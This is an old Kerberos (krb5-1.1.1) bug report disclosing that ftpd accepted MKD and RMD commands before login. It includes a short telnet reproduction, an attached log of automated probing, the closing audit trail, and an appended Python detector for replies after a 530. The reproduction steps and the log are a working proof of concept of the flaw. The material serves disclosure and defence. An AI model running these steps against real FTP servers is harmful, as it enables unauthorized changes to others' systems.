From Christopher@tfjc.com Wed Jun 14 02:33:31 2000
Received: from fort-point-station.mit.edu (FORT-POINT-STATION.MIT.EDU [18.72.0.53])
    by rt-11.mit.edu (8.9.3/8.9.3) with ESMTP id CAA06383
    for ; Wed, 14 Jun 2000 02:33:27 -0400 (EDT)
Received: from Sally.TfJC.Com (sally.tfjc.com [216.32.33.239] (may be forged))
    by fort-point-station.mit.edu (8.9.2/8.9.2) with ESMTP id CAA01618
    for ; Wed, 14 Jun 2000 02:33:24 -0400 (EDT)
Received: from Shelby.TfJC (Shelby.TfJC [192.168.50.3])
    by Sally.TfJC.Com (8.9.3/8.8.7) with ESMTP id XAA30111;
    Tue, 13 Jun 2000 23:33:15 -0700
Received: from Mail.TfJC.Com (localhost.localdomain [127.0.0.1])
    by Shelby.TfJC (8.9.3/8.8.7) with ESMTP id XAA01947;
    Tue, 13 Jun 2000 23:33:13 -0700
Message-Id: <39472721.EBFD36DD@Mail.TfJC.Com>
Date: Tue, 13 Jun 2000 23:33:05 -0700
From: "Christopher R. Thompson"
Sender: Chris@tfjc.com
To: krb5-bugs@mit.edu, "cert@cert.org"
Subject: Ftp Security Bug. krb5-1.1.1

>Number: 858
>Category: krb5-appl
>Synopsis: Ftp Security Bug. krb5-1.1.1
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: tlyu
>State: closed
>Class: sw-bug
>Submitter-Id: unknown
>Arrival-Date: Wed Jun 14 02:34:00 EDT 2000
>Last-Modified: Mon Jul 9 16:46:55 EDT 2001
>Originator: "Christopher R. Thompson"
>Organization:
>Release: krb5-1.1.1
>Environment:
>Description:
This is a multi-part message in MIME format.
--------------F7615CA233D622EED70B9E28
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hackers have been busy the last month trying to get into my kerberized ftp site and Saturday while I was away someone managed to actually create a directory as root in my / "root" directory. This was achieved with the MKD command and is reproducible with the following commands.

    telnet host 21
    mkd test1
    mkd test2
    rmd test1
    quit

"host" now contains the directory named "/test1". Directory "/test2" was created and then deleted.
Following each mkd/rmd command the ftpd host requests "530 please login with USER and PASS." and then either "257 MKD command successful." or "250 RMD command successful."

I have not examined the ftpd code yet but I can only hope this is the only hole. Making and deleting directory entries is rather benign but some unscrupulous hacker could engineer a DOS attack on unsuspecting ftp hosts.

Note the attached FTP LOG. These appear to be automated scripts and are a regular daily and weekly occurrence for me here.

--------------F7615CA233D622EED70B9E28
Content-Type: text/plain; charset=us-ascii; name="test"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="test"

Jun 10 05:08:59 sally ftpd[21432]: connect from 129.125.104.178
Jun 10 05:08:59 sally ftpd[21432]: connection from 129.125.104.178 (flits104-178.flits.rug.nl) at Sat Jun 10 05:08:59 2000
Jun 10 05:08:59 sally ftpd[21432]: <--- 220
Jun 10 05:08:59 sally ftpd[21432]: Sally.TfJC.Com FTP server (Version 5.60) ready.
Jun 10 05:08:59 sally ftpd[21432]: command: (13)
Jun 10 05:08:59 sally ftpd[21432]: <--- 530
Jun 10 05:08:59 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:08:59 sally ftpd[21432]: <--- 257
Jun 10 05:08:59 sally ftpd[21432]: MKD command successful.
Jun 10 05:09:00 sally ftpd[21432]: command: (7)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: (16)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: (13)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: <--- 550
Jun 10 05:09:00 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:00 sally ftpd[21432]: command: (7)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: (14)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: (13)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: <--- 550
Jun 10 05:09:01 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:01 sally ftpd[21432]: command: (7)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: (16)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: (13)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: <--- 550
Jun 10 05:09:01 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:01 sally ftpd[21432]: command: (7)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: (16)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: (13)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: <--- 550
Jun 10 05:09:02 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:02 sally ftpd[21432]: command: (7)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: (16)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: (13)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: <--- 550
Jun 10 05:09:03 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:03 sally ftpd[21432]: command: (7)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: (15)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: (13)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: <--- 550
Jun 10 05:09:03 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:03 sally ftpd[21432]: command: (7)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: (17)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: (13)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: <--- 550
Jun 10 05:09:04 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:04 sally ftpd[21432]: command: (7)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: (14)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: (13)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: <--- 550
Jun 10 05:09:05 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:05 sally ftpd[21432]: command: (7)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: (16)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: (13)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: <--- 550
Jun 10 05:09:05 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:05 sally ftpd[21432]: command: (7)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: (15)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: (13)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: <--- 550
Jun 10 05:09:06 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:06 sally ftpd[21432]: command: (7)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: (11)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: (13)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: <--- 550
Jun 10 05:09:07 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:07 sally ftpd[21432]: command: (7)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: (26)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: (13)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: <--- 550
Jun 10 05:09:07 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:07 sally ftpd[21432]: command: (7)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: (26)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: (13)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: <--- 550
Jun 10 05:09:08 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:08 sally ftpd[21432]: command: (7)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: (16)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: (13)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: <--- 550
Jun 10 05:09:09 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:09 sally ftpd[21432]: command: (7)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: (15)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: (13)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: <--- 550
Jun 10 05:09:09 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:09 sally ftpd[21432]: command: (7)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: command: (21)
Jun 10 05:09:10 sally ftpd[21432]: <--- 530
Jun 10 05:09:10 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: command: (13)
Jun 10 05:09:10 sally ftpd[21432]: <--- 530
Jun 10 05:09:10 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: <--- 550
Jun 10 05:09:10 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:10 sally ftpd[21432]: atmark: c=-1
Jun 10 05:09:10 sally ftpd[21432]: lost connection

--------------F7615CA233D622EED70B9E28--

>How-To-Repeat:
>Fix:
>Audit-Trail:

Responsible-Changed-From-To: gnats-admin->krb5-unassigned
Responsible-Changed-By: raeburn
Responsible-Changed-When: Sat Jun 23 01:37:25 2001
Responsible-Changed-Why:

Responsible-Changed-From-To: krb5-unassigned->tlyu
Responsible-Changed-By: raeburn
Responsible-Changed-When: Mon Jul 9 16:42:02 2001
Responsible-Changed-Why:
I *think* this is one of the ones you plugged a while back. Please confirm it and close this PR if appropriate...

State-Changed-From-To: open-closed
State-Changed-By: tlyu
State-Changed-When: Mon Jul 9 16:46:28 2001
State-Changed-Why:
This has been fixed a while ago. The 1.2.2 release should have a fix for it, among many other things.

>Unformatted:
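
Added example, not part of the original report or of the krb5 code: a Python check for the symptom described above, generalized from the 257/250 case to any second reply logged after a 530 for the same command. It assumes the syslog layout of the attached log (reply code and reply text on consecutive ftpd lines, "command:" opening each command); the function name, host name and PIDs are invented for illustration.

```python
import re
from collections import defaultdict

# Layout assumed from the attached log: code line, then text line; "command:" starts a command.
LINE = re.compile(r"ftpd\[(\d+)\]: (.*)$")
REPLY = re.compile(r"<--- (\d{3})\s*$")

def replies_after_530(lines):
    """Return (pid, code, text) for every reply sent after a 530 to the same command."""
    state = defaultdict(lambda: {"denied": False, "pending": None})
    findings = []
    for raw in lines:
        m = LINE.search(raw)
        if not m:
            continue
        pid, msg = m.group(1), m.group(2).strip()
        s = state[pid]
        reply = REPLY.match(msg)
        new_cmd = msg.startswith("command:")
        if s["pending"] is not None:
            # The line after a flagged reply code normally carries its text.
            code, s["pending"] = s["pending"], None
            is_text = not (reply or new_cmd)
            findings.append((pid, code, msg if is_text else ""))
            if is_text:
                continue
        if new_cmd:
            s["denied"] = False
        elif reply:
            code = int(reply.group(1))
            if s["denied"]:
                s["pending"] = code      # a handler ran despite the 530
            elif code == 530:
                s["denied"] = True
    # Flush codes whose text line never arrived (log cut off).
    findings += [(p, s["pending"], "") for p, s in state.items() if s["pending"] is not None]
    return findings

# Constructed sample in the format of the attached log (host and PIDs invented).
P = "Jun 10 05:09:00 ftphost ftpd[%d]: %s"
SAMPLE = [P % (4001, t) for t in (
    "command: (13)", "<--- 530", "Please login with USER and PASS.",
    "<--- 257", "MKD command successful.",
    "command: (13)", "<--- 530", "Please login with USER and PASS.",
    "<--- 550", "test345: File exists.")]
SAMPLE += [P % (4002, t) for t in (
    "command: (7)", "<--- 530", "Please login with USER and PASS.")]
if __name__ == "__main__":
    for pid, code, text in replies_after_530(SAMPLE):
        print(f"ftpd[{pid}]: reply {code} after 530: {text}")
```

A 550 "File exists" after the 530 is reported as well as the 257, since it shows the directory handler was still reached for an unauthenticated session.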